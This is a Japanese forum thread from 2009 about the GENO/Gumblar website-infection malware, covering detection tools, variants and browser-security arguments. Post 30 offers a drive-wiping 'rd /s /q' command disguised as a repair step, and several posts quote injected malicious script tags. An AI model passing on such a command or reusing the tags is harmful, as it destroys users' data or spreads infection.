GENOウイルススレ ★23at SEC
GENOウイルススレ ★23 - 暇つぶし2ch2:名無しさん@お腹いっぱい。
09/12/01 04:02:55

■ 感染の確認方法
10月からの亜種はウイルスがレジストリの痕跡を隠蔽するため
11月現在簡単な確認方法がありません
今回対応がよさそうなKasperskyでスキャンしてください

@niftyウイルスチェックサービス(Kasperskyエンジンのオンラインスキャン)
URLリンク(www.nifty.com)

■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
URLリンク(blogs.technet.com)
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
URLリンク(itpro.nikkeibp.co.jp)

■ 旧型GENOウイルスのまとめなど
*** 【注意!】10月からの亜種には無効な情報があります ***
★Anubisレポート
URLリンク(anubis.iseclab.org)
★GENOウイルスまとめ
URLリンク(www29.atwiki.jp)


【関連スレ】
GENOウイルススレ 感染4台目 - インターネット板
スレリンク(internet板)
【報告専用】同人サイト向け・GENOウィルス注意11 - 同人板
スレリンク(doujin板)

3:名無しさん@お腹いっぱい。
09/12/01 04:06:02
★過去スレ
GENOウイルススレ
スレリンク(sec板)
GENOウイルススレ ★2
スレリンク(sec板)
GENOウイルススレ ★3
スレリンク(sec板)
GENOウイルススレ ★4
スレリンク(sec板)
GENOウイルススレ ★5
スレリンク(sec板)
GENOウイルススレ ★5
スレリンク(sec板)
GENOウイルススレ ★7
スレリンク(sec板)
GENOウイルススレ ★8
スレリンク(sec板)
GENOウイルススレ ★9
スレリンク(sec板)
GENOウイルススレ ★10
スレリンク(sec板)
GENOウイルススレ ★11
スレリンク(sec板)

4:名無しさん@お腹いっぱい。
09/12/01 04:11:44
★過去スレ
GENOウイルススレ ★12
スレリンク(sec板)
GENOウイルススレ ★13
スレリンク(sec板)
GENOウイルススレ ★14
スレリンク(sec板)
GENOウイルススレ ★15
スレリンク(sec板)
GENOウイルススレ ★16
スレリンク(sec板)
GENOウイルススレ ★17
スレリンク(sec板)
GENOウイルススレ ★18
スレリンク(sec板)
GENOウイルススレ(Gumblar,Martuz,JSRedir-R) ★19
スレリンク(sec板)
GENOウイルススレ ★20
スレリンク(sec板)
GENOウイルススレ ★21
スレリンク(sec板)
GENOウイルススレ ★22
スレリンク(sec板)

5:名無しさん@お腹いっぱい。
09/12/01 07:30:19
Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
URLリンク(www.forest.impress.co.jp)
URLリンク(hide9999.web.fc2.com)

6:名無しさん@お腹いっぱい。
09/12/01 08:01:54
アプリケーションの脆弱性確認ツール

MyJVN バージョンチェッカ
URLリンク(jvndb.jvn.jp)

Secunia Personal Software Inspector (PSI)
URLリンク(secunia.com)

7:名無しさん@お腹いっぱい。
09/12/01 13:26:03
いちもつ

しかしだな、前スレ(22)以前の物はいらないと思う。


8:名無しさん@お腹いっぱい。
09/12/01 14:01:30
個人情報をさらすマルウェア、Shareを通じて日本で流通
URLリンク(headlines.yahoo.co.jp)

これってエロゲーにsetup.exeを仕込まれてた例のアレ?
晒し会場(現在は404)
URLリンク(p3p.jp)

winnyでファイルをDLしたんですが、そこでシリアルが必要といわれ...
URLリンク(detail.chiebukuro.yahoo.co.jp)

9:名無しさん@お腹いっぱい。
09/12/01 19:05:54
スレ違いっつーか板違い
ダウソ板でやれ

10:名無しさん@お腹いっぱい。
09/12/02 15:52:57
■ 感染確認・駆除ツール等
アンラボ(v3daonol.exe)
URLリンク(www.ahnlab.co.jp)
マカフィー(stinger.exe)
URLリンク(www.mcafee.com)
Kaspersky(KatesKiller.exe)
URLリンク(support.kaspersky.com)

11:名無しさん@お腹いっぱい。
09/12/03 16:43:07
【誤検出?】avast!報告スレ【Win32:Delf-MZG】
スレリンク(sec板)

これもGENO系なの?

12:名無しさん@お腹いっぱい。
09/12/03 16:44:59
それはただの誤検出

13:名無しさん@お腹いっぱい。
09/12/03 18:03:32
まだまだ猛威を振るってますね。。
URLリンク(www.virustotal.com)

対応済み:AntiVir・AVG・F-Secure・K7AntiVirus・McAfee・Panda・Symantec 他
未対応:Avast・BitDefender・GData・Kaspersky・Microsoft・NOD32・TrendMicro 他

14:名無しさん@お腹いっぱい。
09/12/03 18:08:06
Shareの奴だろ。関係ないからダウソ板に帰れって。

15:名無しさん@お腹いっぱい。
09/12/03 18:14:05
>>14
これGumblar.x 系らしいよ。

16:名無しさん@お腹いっぱい。
09/12/03 18:22:29
デタラメもいい加減にしろよ。
> Symantec 1.4.4.12 2009.12.03 Infostealer.Kenzero

Illegal Games? Pay the Price?Publicly!
URLリンク(www.symantec.com)
Infostealer.Kenzero primarily arrives in the guise of setup.exe,
which in this case is a fake installation file for Japanese pornographic games
that are circulating around the file-sharing network “Share.”
Several pornographic games have been reported to include this malicious setup.exe file.

17:名無しさん@お腹いっぱい。
09/12/03 19:11:20
       ____
     /      \
   /  _ノ  ヽ、_  \
  / o゚((●)) ((●))゚o \  ほんとはShareでエロゲを違法ダウンロードしたんだお…
  |     (__人__)'    |
  \     `⌒´     /

       ____
     /      \
   /  _ノ  ヽ、_  \
  /  o゚⌒   ⌒゚o  \  でも恥ずかしくて言えないお…
  |     (__人__)    |
  \     ` ⌒´     /

       ____
     /⌒  ⌒\
   /( ●)  (●)\
  /::::::⌒(__人__)⌒::::: \   だからGENOのせいにするお!
  |     |r┬-|     |
  \      `ー'´     /

18:名無しさん@お腹いっぱい。
09/12/05 02:03:17
Win7でも感染報告があったらしいけど、それでもVistaだけは安全なの?

19:名無しさん@お腹いっぱい。
09/12/05 02:06:59
知らないけど報告は間違ってる場合もあるからな
以前も感染するわけ無いのに報告あったから

20:名無しさん@お腹いっぱい。
09/12/05 02:09:19
ちょっと知識がある人は感染しない
感染したと言ってる人は本当かどうかは別として知識がない
だから報告も信憑性がない

21:名無しさん@お腹いっぱい。
09/12/05 07:21:36
とりあえず前スレ埋めてこようぜ

22:名無しさん@お腹いっぱい。
09/12/05 12:11:38
AdobeがFlash Playerのアップデートを予告、Illustratorには脆弱性発覚
スレリンク(news板)

23:名無しさん@お腹いっぱい。
09/12/05 12:47:38
Vistaや7で感染したって人はUAC切ってたんだろ

24:名無しさん@お腹いっぱい。
09/12/05 13:26:35
以前のGENOはバージョンチェックしてたからUACは関係ない
それでも感染したとか言う人がいた

25:名無しさん@お腹いっぱい。
09/12/05 16:03:40
URLリンク(jp.trendmicro.com)
先月4位から1位に浮上したのは、感染コンピュータのユーザ情報や
FTPサーバへのログイン名とパスワードを盗み出そうとする「TSPY_KATES(カテス)」です。
「TSPY_KATES」は、「JS_GUMBLER(ガンブラー)」や「JS_IFRAME(アイフレーム)」によって
改ざんされた正規のWebサイトから、リダイレクトされる不正なWebサイトより感染することが確認されています。

URLリンク(www.viruslist.com)
URLリンク(www.viruslist.com)
感染 日本7位
リダイレクタ 日本6位


26:名無しさん@お腹いっぱい。
09/12/05 20:06:53
さすがエロサイト動画サイト大好き日本人

27:名無しさん@お腹いっぱい。
09/12/06 01:24:11
gred AntiVirus アクセラレータ
スレリンク(sec板)

28:名無しさん@お腹いっぱい。
09/12/06 10:42:39
「2009.11.06 日曜日」
URLリンク(www3.atword.jp)
gnomeさん・・・時計が1ヶ月ずr(ry

29:名無しさん@お腹いっぱい。
09/12/06 14:22:19
画面が真っ黒になるわけじゃないけどポインタだけになって何もできない
もちろんセーフモードでも起動できない
でも5回くらいやってるとまた何事もなかったかのように起動する

30:名無しさん@お腹いっぱい。
09/12/06 15:33:50
>>29
ウイルス感染?それともハード関連の不具合かな?
OS他PCスペック等が判らないからなんとも言えないが、
簡易検出の「チェックディスクコマンド」を試してみ。

1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。

上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:

これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。

31:名無しさん@お腹いっぱい。
09/12/06 17:56:49
ありがとう。すっぱり綺麗になった。

32:名無しさん@お腹いっぱい。
09/12/06 23:12:01
誰もひっかからないとは思うが一応書いとく
>30を実行するとフォルダが全部削除されるから気をつけろ
とりあえず通報しといた

33:名無しさん@お腹いっぱい。
09/12/07 01:36:36
>>32
アドバイスありがとう。
だが大丈夫だ。今時のゆとりは(俺含め)、
こんなコマンドなんざ面倒くさがっていちいち打ったりしない。

34:名無しさん@お腹いっぱい。
09/12/07 01:41:17
前スレ埋めてきた。 ついでに新型の情報を転載っと。

--

962 :名無しさん@お腹いっぱい。:2009/12/03(木) 14:49:43
Trojan-Downloader.JS.Gumblar.x 確認
www●jwell●com

963 :名無しさん@お腹いっぱい。:2009/12/03(木) 15:24:10
jsに突っ込まれてるね。
/js/font.js
/js/base.js
/inc/prog.js


35:名無しさん@お腹いっぱい。
09/12/08 08:25:27
結局フラッシュだかadobe等更新しとけばいいだけ


36:名無しさん@お腹いっぱい。
09/12/08 08:27:12
だか、等
とか言われるとスゲー不安

37:名無しさん@お腹いっぱい。
09/12/08 08:33:43
日常使うソフトなんか限られるわけだから
全部最新版にしておけばいい
スクリプト防いだ!スゴイ!よりは効果があるわ

38:名無しさん@お腹いっぱい。
09/12/08 08:35:59
日本語でおk

39:名無しさん@お腹いっぱい。
09/12/08 08:38:34
こんなスレでまじになっちゃってどうするの


40:名無しさん@お腹いっぱい。
09/12/08 08:40:03
IE使うなとか馬鹿か
MACウイルス無いとか威張ってるのと同じだな

41:名無しさん@お腹いっぱい。
09/12/08 08:47:07
unDonutとTheworldとIE7を使い分けてるぜ

42:名無しさん@お腹いっぱい。
09/12/08 09:26:47
Windows使わなければ何も怖いことはない。


43:名無しさん@お腹いっぱい。
09/12/08 09:33:13
パソコン使わなければいいじゃん。

44:名無しさん@お腹いっぱい。
09/12/08 10:28:45
とにかく
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
はなおせよ
それが嫌ならMacつかいましょうもテンプレに入れろカス

45:名無しさん@お腹いっぱい。
09/12/08 10:39:10
火狐野郎がNoScript宣伝したかっただけ
IEでもスクリプトオフに出来るしIEで修正されてない脆弱性を突くとか言う情報も無し
せいぜいシェアが低いから狙われにくいとかいうのぐらいだろ
他人に強制するほどの根拠があるかね
Windows使うの辞めろよ
使い勝手はIEコンポブラウザならかわらんし

46:名無しさん@お腹いっぱい。
09/12/08 10:42:38
ここまで全部俺

47:名無しさん@お腹いっぱい。
09/12/08 10:46:48
Firefox使いだがNoScriptはいろいろな意味で嫌い。

48:名無しさん@お腹いっぱい。
09/12/08 12:19:56
ここまでScript

49:名無しさん@お腹いっぱい。
09/12/08 12:46:17
火狐野郎が

50:名無しさん@お腹いっぱい。
09/12/08 12:50:17
こんにちはGoogleです

51:名無しさん@お腹いっぱい。
09/12/08 12:51:55
Firefoxつかいが頭おかしい事がまたあかるみになったのか

52:名無しさん@お腹いっぱい。
09/12/08 13:11:47
オープンソースがすごい?
リナックスでも使ってろ糞狐

53:名無しさん@お腹いっぱい。
09/12/08 18:35:26
Windows使ってんだからIE使うのが普通だしな

54:名無しさん@お腹いっぱい。
09/12/08 18:39:30
保守おつかれさまです

55:名無しさん@お腹いっぱい。
09/12/08 18:41:08
なあに馬鹿なの

56:名無しさん@お腹いっぱい。
09/12/08 18:42:50
何使おうが自由だ
押し付けがましいんだよ
Firefox厨

57:名無しさん@お腹いっぱい。
09/12/08 18:44:49
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
※よくわからない人は「Firefox+NoScript」を導入しましょう。

よく分からない奴がそんなモン使うわけねえだろきめえ

58:名無しさん@お腹いっぱい。
09/12/08 18:45:37
この子なんでこんなに必死なの

59:名無しさん@お腹いっぱい。
09/12/08 18:47:26
必死だなこんな糞スレで

60:名無しさん@お腹いっぱい。
09/12/08 18:47:32
すごいね
一人で何回も書き込んじゃってw

61:名無しさん@お腹いっぱい。
09/12/08 18:48:26
Firefox使えとかうぜえ

62:名無しさん@お腹いっぱい。
09/12/08 18:49:16
俺の自演だけど毎回茶々いれてくる馬鹿暇人が混じるから迷惑だ

63:名無しさん@お腹いっぱい。
09/12/08 18:51:19
どっかの誰かが作ってちょっと突っ込まれたらすぐいじるような糞アドオンつかうのなら
IEでスクリプト全オフでブラウジングしたほうがまし

64:名無しさん@お腹いっぱい。
09/12/08 18:55:49
GENO対策なんか更新しとけばオワリ
スレ伸ばすにはにはNoScriptがいいとか書いてテンプレwいじれば
ブラウザ戦争が勃発


65:名無しさん@お腹いっぱい。
09/12/08 19:07:27
FirefoxだけプラグインのNoscript使えとか書いて
他のやる気なさすげえ


66:名無しさん@お腹いっぱい。
09/12/08 19:35:41
糞チェッカーは糞

67:名無しさん@お腹いっぱい。
09/12/09 15:36:17
Flash Playerの最新バージョン公開、深刻な脆弱性を修正
URLリンク(internet.watch.impress.co.jp)

68:名無しさん@お腹いっぱい。
09/12/09 15:59:32
NoScriptなんかでいばるより更新しとけってこと

69:名無しさん@お腹いっぱい。
09/12/09 16:31:01
10,0,32,18からかわんねえぞ

70:名無しさん@お腹いっぱい。
09/12/09 18:17:03
一回アンインスコしないと

71:名無しさん@お腹いっぱい。
09/12/09 18:19:42
firefox/opera版はプラグイン形式で簡単だからいいね
いつも、普通にコントロールパネルから通常アンインストール→最新版をインストールでやってる
IEはエンジン部分だけ2chブラウザで利用しているが完全放置
flashも入れていない

72:名無しさん@お腹いっぱい。
09/12/09 18:29:46
しらねえよカス

73:名無しさん@お腹いっぱい。
09/12/09 18:30:58
火狐野郎はなにかにつけてどうでもいいことにケチつけるな


74:名無しさん@お腹いっぱい。
09/12/09 18:31:30
Adobe Flash Player のバージョンテスト
URLリンク(www.adobe.com)
(各ブラウザで確認すること)

インスコ時のバージョン○○がインスコされましたってのは
Adobeの中の人の手打ちなので信用すんな

75:名無しさん@お腹いっぱい。
09/12/09 18:33:08
アンインストールする必要ないな別に

76:名無しさん@お腹いっぱい。
09/12/09 18:39:56
IEも他のも自動で変わるからアンインスコとかいらんね

77:名無しさん@お腹いっぱい。
09/12/09 18:43:10
またIEアンチが頭おかしい理屈こねたのか

78:名無しさん@お腹いっぱい。
09/12/09 18:44:19
このスレ☆10ぐらいから500レスは俺だな

79:名無しさん@お腹いっぱい。
09/12/09 21:33:05
>>71
>>5

80:名無しさん@お腹いっぱい。
09/12/10 12:27:45
とにかく
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
はなおせよ
それが嫌ならMacつかいましょうもテンプレに入れろカス


81:名無しさん@お腹いっぱい。
09/12/10 13:25:33
>>80
IE(笑)は、スクリプト以前にActiveXがうんこ


82:名無しさん@お腹いっぱい。
09/12/10 13:29:39
Netscape(笑)Pluginほどでは(笑)

83:名無しさん@お腹いっぱい。
09/12/10 13:34:56
糞火狐がまたGENOと関係ないこといってら

84:名無しさん@お腹いっぱい。
09/12/10 13:36:10
火狐野郎がNoScript宣伝したかっただけ
IEでもスクリプトオフに出来るしIEで修正されてない脆弱性を突くとか言う情報も無し
せいぜいシェアが低いから狙われにくいとかいうのぐらいだろ


85:名無しさん@お腹いっぱい。
09/12/10 13:40:16
いまだActiveXが危険とかいってんのか
どんだけー

86:名無しさん@お腹いっぱい。
09/12/10 13:42:10
自分で撃ってくれと弾が入った鉄砲を渡したあほ
鉄砲が危険だから死んだと遺族が訴えた

87:名無しさん@お腹いっぱい。
09/12/10 13:47:15
オープンソースがすごい?
リナックスでも使ってろ

88:名無しさん@お腹いっぱい。
09/12/10 13:48:29
とにかく
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
はなおせよ

89:名無しさん@お腹いっぱい。
09/12/10 13:52:07
>>57
まったくその通りです。
むしろよくわからない人は「NoScript」を導入しないで下さいだと思う。
ここはブラウザの優劣を競うすれじゃないんだし、並列に扱えばいいじゃない。

■ブラウザでスクリプト使用を基本無効に設定
ここに>>84さんの言うIEの設定方法を書き加えて

これを削除する
↓↓↓
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の
用途に使わないで下さい。
※よくわからない人は「Firefox+NoScript」を導入しましょう。

90:名無しさん@お腹いっぱい。
09/12/10 13:54:03
■ブラウザでスクリプト使用を基本無効に設定
このくだりは全部いらねえよ
更新だけしとけばいい

91:名無しさん@お腹いっぱい。
09/12/10 14:07:23
ツール(T) -> インターネットオプション(O) -> 「セキュリティ」タブ ->
「レベルのカスタマイズ」ボタン -> 「スクリプト」 の「アクティブスクリプト」で「無効にする」を選択。
でjavascript無効

セキュリティのインターネットのゾーンを基本全部無効にして
信頼済みサイトに追加していけばいいだろう
noscriptとか使うのと同じ感じになる
IEコンポ系ではワンタッチで有効無効を切り替えられるのもある

まあスクリプト使用!危険
そんなヒステリーにつきあってられるかってのが実際だ

92:名無しさん@お腹いっぱい。
09/12/10 14:21:29
糞チェッカーはうんこ

93:名無しさん@お腹いっぱい。
09/12/10 14:35:13
>89
荒らしに構うな

94:名無しさん@お腹いっぱい。
09/12/10 14:36:22
>>信頼済みサイトに追加していけばいいだろう
これが大変なんだけどね…

95:名無しさん@お腹いっぱい。
09/12/10 14:37:50
真するー出来ないやつがきたな

96:名無しさん@お腹いっぱい。
09/12/10 14:41:12
すくりぷと使用しないとか強い意志があるならそれでいいだろ
NoScriptなら簡単に追加できる!!馬鹿かと

97:名無しさん@お腹いっぱい。
09/12/10 14:48:00
>>1-96
ここまでNoScriptをスルーできない人でお送りしました。

98:名無しさん@お腹いっぱい。
09/12/10 14:50:34
>>97
スルー

99:名無しさん@お腹いっぱい。
09/12/10 14:51:49
89と97は俺じゃない

100:名無しさん@お腹いっぱい。
09/12/10 15:18:48
むしろIE版noscriptつくれ

101:名無しさん@お腹いっぱい。
09/12/10 17:38:23
URLリンク(www3.atword.jp)
【Zlkon, Gumblar 問題に関して】
>Firefox+NoScriptの使用を検討してください。

g'nomeさんが推奨してるから良いんでね?

NoScriptの設定で<IFRAME>を禁止にしておけば、
IFRAMEインジェクションも阻止れるし。
IFRAME=うざい広告、アクセス解析、webビーーー~・・・(ry

102:名無しさん@お腹いっぱい。
09/12/10 18:56:28
g'nomeさんて誰だよ
そんなやつがどうだろうが知るかぼけが

103:名無しさん@お腹いっぱい。
09/12/10 18:58:29
また火狐野朗が他の関係ないこといいだしたのか

104:名無しさん@お腹いっぱい。
09/12/10 19:04:09
>>NoScriptの設定で<IFRAME>を禁止にしておけば…
NoScriptしかしらんのか

105:名無しさん@お腹いっぱい。
09/12/10 19:06:55
何使おうが自由だ
押し付けがましいんだよ
Firefox厨

106:名無しさん@お腹いっぱい。
09/12/10 19:13:01
IEでの対処方書いて
テンプレ新しく作れよ

107:名無しさん@お腹いっぱい。
09/12/10 19:15:21
■ブラウザでスクリプト使用を基本無効に設定
の項目より下はいらん

108:名無しさん@お腹いっぱい。
09/12/10 19:19:02
Windows以外のOSの使用を検討してください。
て書けよ

109:名無しさん@お腹いっぱい。
09/12/10 19:23:14
>>102-107
一人で連投して必死だなw
おまい、MSの社員だろ?

110:名無しさん@お腹いっぱい。
09/12/10 19:24:32
■ブラウザでスクリプト使用を基本無効に設定
InternetExplorer ツール→インターネットオプション→セキュリティ→
  レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
  (ブラウザ再起動をしないと適用されない)
Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
  デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
  ※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
   もしくはLunascape5を使うといいようです。
Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
 ※FireFoxの場合、プラグイン「NoScript」のインストールが推奨されているようです
  また、「IE Tab」をインストールすればIEのみに対応したサイトの表示も手動で
  切り替え可能になるのでいざという時便利

111:名無しさん@お腹いっぱい。
09/12/10 19:29:45
(ブラウザ再起動をしないと適用されない)なんてのは嘘だね

112:名無しさん@お腹いっぱい。
09/12/10 19:31:42
■ブラウザでスクリプト使用を基本無効に設定
・InternetExplorer ツール→インターネットオプション→セキュリティ→
  レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
・Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
・safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
・Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
  デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
・Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
  ※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
   もしくはLunascape5を使うといいようです。
・Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
 ※FireFoxの場合、プラグイン「NoScript」のインストールが推奨されているようです
  また、「IE Tab」をインストールすればIEのみに対応したサイトの表示も手動で
  切り替え可能になるのでいざという時便利
・Google Chrome -disable-javascriptで起動。

113:名無しさん@お腹いっぱい。
09/12/10 19:33:21
MSの社員じゃないあんたはさっさとWindowsなんぞ使うのやめたら
はるかに安全で使いやすいらしいぞ

114:名無しさん@お腹いっぱい。
09/12/10 19:48:47
Macとか

115:名無しさん@お腹いっぱい。
09/12/10 19:51:15
WebBoyでも使ってろ

116:名無しさん@お腹いっぱい。
09/12/10 20:25:07
g'nomeのとこ、ここではあんま話題にすんな。いろいろあったんだから・・・
自分が参考にする分にはご自由にどうぞ

117:名無しさん@お腹いっぱい。
09/12/10 20:27:30
またそんな釣りレスして

118:名無しさん@お腹いっぱい。
09/12/10 21:38:10
なんか面倒くせえな、もう携帯で見るわ

119:名無しさん@お腹いっぱい。
09/12/10 23:11:12
そこまでしてNoScript否定したいのは何故だ?
アフィで稼いでいる奴が必死になってんのか?


120:名無しさん@お腹いっぱい。
09/12/10 23:36:22
いつもの保守ツールくんだから気にしなくていいよ

121:名無しさん@お腹いっぱい。
09/12/10 23:42:39
アフィやってるヤツならAdblock Plusが敵だろ
サードパーティのスクリプトやオブジェクト全部読み込まないとか出来るけど
NoScriptやRequestPolicyほど融通きかんがな

122:名無しさん@お腹いっぱい。
09/12/10 23:44:11
今回FlashPlayer9の更新もあったのな
もう無いのかと思ってたぜ

123:名無しさん@お腹いっぱい。
09/12/11 08:35:27
NoScript否定したい?
糞火狐が他否定してるんだろカスが


124:名無しさん@お腹いっぱい。
09/12/11 08:46:52
必死こいてテンプレ変えた奴がよくいう

125:名無しさん@お腹いっぱい。
09/12/11 09:07:43
fox房はよくおしつける
使いやすさは人それぞれだし
セキュリティなんぞ努力のおかげでシェアあがって危険ブラウザ
破綻まみれのセールストーク聞き飽きた


126:名無しさん@お腹いっぱい。
09/12/11 09:08:46
話が長いな
その話はもういいよ

127:名無しさん@お腹いっぱい。
09/12/11 09:11:56
はやく900までいかなあかんもんねえ(笑)
1が削除依頼出して建てなおすならともかく

128:名無しさん@お腹いっぱい。
09/12/11 12:09:04
IE(核爆笑)

129:名無しさん@お腹いっぱい。
09/12/11 12:15:34
また召還呪文唱えてるのか火狐

130:名無しさん@お腹いっぱい。
09/12/11 12:16:34
Windows(核爆笑)

131:名無しさん@お腹いっぱい。
09/12/11 17:39:09
Gumblarご乱心?
URLリンク(www)<)●co●in/images/favicon●php ></script>

色々な場所に沢山入ってるんだが・・・


132:名無しさん@お腹いっぱい。
09/12/11 17:48:07
なにそれこわい

133:名無しさん@お腹いっぱい。
09/12/11 17:49:17
www●senbaskasin●net/ms_word●asp?haber=246

「ファイルタイプ: Microsoft Word」
こんなのも引っ掛かるようになってきた

134:名無しさん@お腹いっぱい。
09/12/11 19:39:33
>>131
自動で突っ込むタイプだとよくある。

135:名無しさん@お腹いっぱい。
09/12/12 02:50:48
旅行関係(代理店?)のHP陥落を複数確認。

webtravel●co●jp ※問い合わせページのみ?
URLリンク(www.google.com)

usa-sports●net
URLリンク(www.google.com)

某空港の巻き込みを喰らったと思われる。

※上記以外にもあるような気がするが、調べる時間が無~ orz

136:名無しさん@お腹いっぱい。
09/12/13 05:14:50
ビスタだけどジェノに感染したかも・・・
デスクトップ画面がブラックスクリーン(セーフモードでの起動は可能
これもうクリーンインストールしか手は無いの?
それ以外の回復手段あったら教えてくれ・・・

137:名無しさん@お腹いっぱい。
09/12/13 05:26:05
>>136
クリーンインストール推奨だが・・・ >>10 でどう?
念のためすべてのツールを試してみるとか

138:名無しさん@お腹いっぱい。
09/12/13 05:29:46
トロイの木馬『Buzus』、感染サイトは12万5000以上に

11月下旬に始まった極めて複雑な新型 SQL インジェクション攻撃により、
すでに12万5000以上の Web サイトが、クレジットカード情報や銀行口座などの
情報を収集することで知られるトロイの木馬『Buzus』に感染している。

インターネットのセキュリティおよび監視を手がける企業 ScanSafe によると、
この攻撃はまず、埋め込まれた iframe が「318x.com」というサイトから
第1段階の悪質なコードを読み込むのだという。
その後、ユーザーからは見えない一連の iframe およびコードリダイレクションが、
「windowssp.7766.org」サイトから問題のあるコード「Backdoor.Win32.Buzus.croo」を
密かにインストールして完了する。

URLリンク(japan.internet.com)

139:名無しさん@お腹いっぱい。
09/12/13 06:50:40
>>136 vistaで何やって感染したんだ?


140:名無しさん@お腹いっぱい。
09/12/13 07:30:31
URLリンク(www.forest.impress.co.jp)

141:名無しさん@お腹いっぱい。
09/12/13 12:42:12
政治板でN速+その他を生暖かく見守るスレ 90
スレリンク(seiji板)

142:名無しさん@お腹いっぱい。
09/12/13 17:17:09
uac切ってたんじゃね?

143:名無しさん@お腹いっぱい。
09/12/13 17:50:27
新型によるUACスルーが噂されているがどれも明確なソースがないんだよね

144:名無しさん@お腹いっぱい。
09/12/13 18:07:51
URLリンク(q1w2e3.sakura.ne.jp)

145:名無しさん@お腹いっぱい。
09/12/13 18:47:10
>>143 確かに調べても見つからないね
対象なるとしたら7の方だろうね
ユーザー数適にw


146:名無しさん@お腹いっぱい。
09/12/13 22:48:29
URLリンク(rd.rakuten.co.jp)

これだけ、なぜかnoscriptのXSS遮断が働いたんだけど誤爆?

147:名無しさん@お腹いっぱい。
09/12/14 01:43:09
>>138
<div class="pic_content">
<img src="/XXXXX/XXXX/XXXXX/XX/XXXXX●<script src=URLリンク(7o8)●net></script>

a href、imgとかにも寄生してるから

148:名無しさん@お腹いっぱい。
09/12/14 18:54:20
相談させて欲しい。

カスペさんが、とあるサイトで反応したのでソースを確認したら
<scipt sc=htt//apiwachara.com/images/gifimg.php ></script><body>
というものが入っていた。
ほぼ黒だと思ったので管理人に連絡。
旧GENOの対処だとだめなこと、ウィルスソフトもダメなこと、
カスペインストかニフティのオンラインスキャン等の手段があること、
レジストリ確認(URLリンク(xx2zz.blog77.fc2.com))法があることをメールに記載。

インデックスのみのこしてサイトを削除してくれたが、
・覚えのないタグが入っていた
・削除した
・PCに感染はみとめられない
・感染したわけではないが、念のため
との記載。
その告知ページに上記タグが埋め込まれてるあたりもうどうしたら。

GENOウィルスチェッカーみたいなものが反応してくれたら、信じてもらえるかもと思って
URLリンク(6130.web.fc2.com)
で確認してみたんだけど、「安全です」との結果が出てくる。

新しく作ったHTMLに寄生されている以上、黒で間違いないと思うんだけど、
簡単にわかってもらえる方法はないだろうか?


149:名無しさん@お腹いっぱい。
09/12/14 19:39:02
>>148
前スレより引用。

612 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/11/01(日) 23:53:21
>>610
どんなに丁寧にいっても聞かないやつは聞かない
ぼくの環境では異常ありませんけど^^;とか言われる
レンタル鯖ならレンタル元に連絡したほうが確実だと思うよ

150:名無しさん@お腹いっぱい。
09/12/14 19:46:44
>>148
レジストリによる確認方法は隠蔽されるので、役に立たないと前スレで報告あり
リンク先にもそう記載されているので熟読すること

一応 >>10 の検知駆除ツールを紹介するがどこまで亜種に通用するかは分からない
そもそも感染していないPCからサイトのパスワードの変更をしないと何度でもスクリプトを挿入される
とりあえずSo-netのセキュリティ通信あたりでも管理人に見てもらって理解してもらうくらいか
URLリンク(www.so-net.ne.jp)
URLリンク(www.so-net.ne.jp)

>>149 の通り、管理人に知識がないと、まともな答えは返ってこないので無理かも

151:148
09/12/14 21:04:11
>>149
わざわざひっぱってきてくれてありがとう。真理だな。
もう一回メールして理解してもらえないようならそうするわ。

>>150
レジストリの隠蔽もするとは…自分もよくよく読んでいなかった。指摘ありがとう。
教えてもらったことをふまえてもう一回メール送って説得してみるよ。

152:名無しさん@お腹いっぱい。
09/12/14 21:21:43
>>151
ああそうだ
そのサイトの名前かURLでググってみると↓こういうの出ないかな

「このサイトはコンピュータに損害を与える可能性があります。」

出るようなら危険なサイトと認識されているわけだから
Googleの知名度で説得の材料になるかも・・・

153:名無しさん@お腹いっぱい。
09/12/14 22:07:22
GENOウイルスチェッカーは使えないからaguse gwならいけるんじゃねと
思って試したけどダメだった

カスペはちゃんと反応するみたいだけどなあ
URLリンク(www.virustotal.com)

もしかしたら本人以外のPCが感染してるかも

154:名無しさん@お腹いっぱい。
09/12/14 22:45:02
google先生からゴルァしてもらいたいなら、
↓ここから該当のサイトURLを報告するよろし。
URLリンク(www.google.com)

155:名無しさん@お腹いっぱい。
09/12/14 23:20:48
カスペはゲノには容赦ないな。

156:148
09/12/15 00:23:26
おおお、一通り勉強しなおしてもどってきたら、さらにアドバイスが。
ありがとう!グーグル先生にも問い合わせてみるよ。

>>153
アドレス記入だとエラーが起こるんだけど、
ひょっとしてわざわざ148のウィルスをDLして確認してくれた?
もしそうなら、ほんとありがとう。
そうでない場合は、是非やりかた教えてください。

157:名無しさん@お腹いっぱい。
09/12/15 01:05:50
>>156
